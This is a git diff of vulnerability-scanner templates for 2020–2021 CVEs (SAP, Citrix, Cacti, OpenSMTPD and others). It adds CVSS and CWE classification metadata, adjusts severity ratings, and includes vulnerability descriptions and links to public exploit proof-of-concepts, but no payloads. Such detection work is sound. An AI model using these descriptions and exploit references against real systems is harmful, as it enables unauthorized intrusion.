CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5902 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml index d36d906517..aa4f6887c5 100644 --- a/cves/2020/CVE-2020-6207.yaml +++ b/cves/2020/CVE-2020-6207.yaml @@ -14,6 +14,11 @@ info: - https://github.com/chipik/SAP_EEM_CVE-2020-6207 - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/ - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6207 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index 46077c6fbd..d86e3db289 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -12,6 +12,11 @@ info: - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - https://github.com/chipik/SAP_RECON + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-6287 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index a0bb988cd8..7ff8dd8f94 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC tags: cve,cve2020,sap,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-6308 + cwe-id: CWE-918 + description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability." requests: - method: POST diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 4c27c186ac..572f55b729 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -3,12 +3,17 @@ id: CVE-2020-6637 info: name: OpenSIS v7.3 unauthenticated SQL injection author: pikpikcu - severity: high + severity: critical description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: cve,cve2020,sqli,opensis reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://cinzinga.com/CVE-2020-6637/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6637 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index d08e8d811a..ddd44f6016 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -12,6 +12,10 @@ info: - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7209 requests: - method: GET diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f040fb2e36..f570b6ab86 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -5,6 +5,12 @@ info: severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 tags: cve,cve2020,smtp,opensmtpd,network,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." network: - inputs: diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml index 0d6ceac8da..7f5f53afc6 100644 --- a/cves/2020/CVE-2020-7318.yaml +++ b/cves/2020/CVE-2020-7318.yaml @@ -13,6 +13,11 @@ info: reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2020-7318 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 1ca340cabb..3c7e70486f 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -8,6 +8,11 @@ info: reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7796 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 9f314f0f40..dd62e8fa68 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -10,6 +10,11 @@ info: - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7961 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml index 0e62f1aae1..96ccd5bd0a 100644 --- a/cves/2020/CVE-2020-8091.yaml +++ b/cves/2020/CVE-2020-8091.yaml @@ -9,6 +9,11 @@ info: reference: - https://typo3.org/security/advisory/typo3-psa-2019-003/ - https://www.purplemet.com/blog/typo3-xss-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8091 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml index f12449e30e..f38b0a3567 100644 --- a/cves/2020/CVE-2020-8115.yaml +++ b/cves/2020/CVE-2020-8115.yaml @@ -10,6 +10,11 @@ info: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8115 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml index 396f4c1b06..b638675ca1 100644 --- a/cves/2020/CVE-2020-8163.yaml +++ b/cves/2020/CVE-2020-8163.yaml @@ -7,6 +7,11 @@ info: description: Tests for ability to pass user parameters as local variables into partials reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ tags: cve,cve2020,rails,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8163 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 653c89b7d0..850e1e43ea 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8191 info: name: Citrix ADC & NetScaler Gateway Reflected XSS author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix,xss reference: https://support.citrix.com/article/CTX276688 description: | Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8191 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index b63ac93a82..286402bddc 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml @@ -3,12 +3,17 @@ id: CVE-2020-8193 info: name: Citrix unauthenticated LFI author: pdteam - severity: high + severity: medium reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8193 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 1c08f85a0f..70af4732d1 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml @@ -3,10 +3,15 @@ id: CVE-2020-8194 info: name: Citrix ADC & NetScaler Gateway Reflected Code Injection author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. reference: https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml index 6b7489c55f..6b809abb63 100644 --- a/cves/2020/CVE-2020-8209.yaml +++ b/cves/2020/CVE-2020-8209.yaml @@ -12,6 +12,11 @@ info: reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8209 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml index d63d614467..8db1c6dddd 100644 --- a/cves/2020/CVE-2020-8512.yaml +++ b/cves/2020/CVE-2020-8512.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8512 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index da3aec26dd..05ec699777 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -9,6 +9,11 @@ info: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml index 5cf989eb97..6a244c4df1 100644 --- a/cves/2020/CVE-2020-8771.yaml +++ b/cves/2020/CVE-2020-8771.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." requests: - raw: diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 0a036e89a5..988906da9e 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8813 info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 - severity: critical + severity: high description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8813 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml index 74819b7066..34b82f700e 100644 --- a/cves/2020/CVE-2020-8982.yaml +++ b/cves/2020/CVE-2020-8982.yaml @@ -7,6 +7,11 @@ info: description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. tags: cve,cve2020,citrix,lfi reference: https://support.citrix.com/article/CTX269106 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8982 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 1f7d2d46bb..e19606cf3b 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -8,6 +8,12 @@ info: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9036 + cwe-id: CWE-79 + description: "Jeedom through 4.0.38 allows XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml index b7e04c9990..29d78f3858 100644 --- a/cves/2020/CVE-2020-9047.yaml +++ b/cves/2020/CVE-2020-9047.yaml @@ -21,6 +21,11 @@ info: - https://www.johnsoncontrols.com/cyber-solutions/security-advisories - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01 tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-9047 + cwe-id: CWE-347 requests: - method: GET diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index ff2a299a2b..e7fb124544 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml @@ -19,6 +19,11 @@ info: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-9054 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index f244463bf9..14eed4ccd2 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://www.cvebase.com/cve/2020/9315 tags: cve,cve2020,oracle + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9315 + cwe-id: CWE-306 + description: "** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE." requests: - method: GET diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml index c36d080c80..760e443f9a 100644 --- a/cves/2020/CVE-2020-9344.yaml +++ b/cves/2020/CVE-2020-9344.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9344 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml index 66b1211b6b..a8e7f8c014 100644 --- a/cves/2020/CVE-2020-9376.yaml +++ b/cves/2020/CVE-2020-9376.yaml @@ -13,6 +13,11 @@ info: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182 - https://www.dlink.com.br/produto/dir-610/ tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9376 + cwe-id: CWE-74 requests: - method: POST path: diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index c9f38d9a42..172130f2c4 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -10,6 +10,11 @@ info: author: geeknik severity: high tags: cve,cve2020,django,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index 2336c16344..239b63a125 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -8,6 +8,11 @@ info: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 tags: cve,cve2020,rconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9425 + cwe-id: CWE-670 requests: - method: GET diff --git a/cves/2020/CVE-2020-9483.yaml b/cves/2020/CVE-2020-9483.yaml index e0017d5eda..ef8f233909 100644 --- a/cves/2020/CVE-2020-9483.yaml +++ b/cves/2020/CVE-2020-9483.yaml @@ -8,6 +8,11 @@ info: When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. reference: https://github.com/apache/skywalking/pull/4639 tags: cve,cve2020,sqli,skywalking + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9483 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml index 4765190c8e..95f1a4eec0 100644 --- a/cves/2020/CVE-2020-9484.yaml +++ b/cves/2020/CVE-2020-9484.yaml @@ -14,6 +14,11 @@ info: tags: cve,cve2020,apache reference: - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.00 + cve-id: CVE-2020-9484 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index cd341cf256..583cee2db1 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -2,7 +2,7 @@ id: CVE-2020-9490 info: name: CVE-2020-9490 - severity: medium + severity: high description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. author: philippedelteil tags: cve,cve2020,apache,dos @@ -11,6 +11,11 @@ info: - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-9490 + cwe-id: CWE-444 requests: - method: GET diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index d8143b9e67..062a835761 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index c9ef094170..fac0befccd 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -6,6 +6,16 @@ info: severity: high description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller. tags: cve,cve2020,ssti + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9757 + cwe-id: CWE-74 + reference: + - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md + - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt + - https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b + - https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f requests: - method: GET diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 35aef60dbd..0074e7885d 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -15,6 +15,11 @@ info: - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md tags: cve,cve2021,cisco,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-1497 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 9c9c57c372..f0e0214349 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,lfi,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20090 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 6ac0d4f526..650be7cd88 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20091 info: name: Buffalo WSR-2533DHPL2 - Configuration File Injection author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. reference: @@ -11,6 +11,10 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-20091 requests: - raw: diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index a419448255..72246e7705 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20092 info: name: Buffalo WSR-2533DHPL2 - Improper Access Control author: gy741,pdteam,parth - severity: critical + severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. reference: @@ -11,6 +11,11 @@ info: - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 tags: cve,cve2021,buffalo,firmware,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20092 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-20114.yaml b/cves/2021/CVE-2021-20114.yaml index 981a841397..1d17cd2a0e 100644 --- a/cves/2021/CVE-2021-20114.yaml +++ b/cves/2021/CVE-2021-20114.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20114 tags: cve,cve2021,tcexam,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-20114 + cwe-id: CWE-200 requests: - method: GET path: diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml index cbfbd7cb86..182a3934d7 100644 --- a/cves/2021/CVE-2021-21234.yaml +++ b/cves/2021/CVE-2021-21234.yaml @@ -10,6 +10,11 @@ info: - https://github.com/cristianeph/vulnerability-actuator-log-viewer - https://nvd.nist.gov/vuln/detail/CVE-2021-21234 tags: 